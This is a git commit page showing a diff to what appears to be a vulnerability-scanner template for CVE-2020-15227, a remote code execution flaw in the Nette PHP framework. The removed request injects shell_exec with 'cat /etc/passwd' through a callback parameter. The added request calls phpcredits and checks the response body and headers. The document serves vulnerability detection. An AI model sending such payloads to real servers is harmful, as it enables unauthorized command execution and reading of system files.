Merge pull request #9282 from Michal-Mikolas/15227
Improved detection of CVE-2020-15227, now independent of server OSpatch-1
commit
025d3ab311
|
@ -27,20 +27,25 @@ info:
|
|||
max-request: 1
|
||||
vendor: nette
|
||||
product: application
|
||||
fofa-query: app="nette-Framework"
|
||||
verified: true
|
||||
tags: cve2020,cve,nette,rce
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
|
||||
- "{{BaseURL}}/nette.micro/?callback=phpcredits"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "PHP Credits"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Nette Framework"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100c514809246bae4d622a6f54b7f309f8d1838a8320122852f607689aa0d8591f00220583827d07fe105e21e3f2c8d355bd4a383c60d0b9fa26ec3897668a09ea6a421:922c64590222798bb761d5b6d8e72950
|
Loading…
Reference in New Issue